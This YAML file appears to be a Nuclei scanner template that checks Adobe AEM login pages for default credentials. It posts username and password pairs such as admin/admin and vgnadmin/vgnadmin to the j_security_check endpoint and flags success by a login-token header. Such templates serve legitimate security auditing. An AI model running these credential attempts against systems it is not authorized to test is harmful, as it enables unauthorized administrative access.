id: aem-default-login

info:
  name: Adobe AEM Default Login
  author: random-robbie
  severity: critical
  tags: aem,default-login

requests:
  - raw:
      - |
        POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/libs/granite/core/content/login.html

        _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true

    attack: pitchfork
    payloads:
      aem_user:
        - admin
        - grios
        - replication-receiver
        - vgnadmin

      aem_pass:
        - admin
        - password
        - replication-receiver
        - vgnadmin

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        condition: and
        words:
          - login-token
          - crx.default
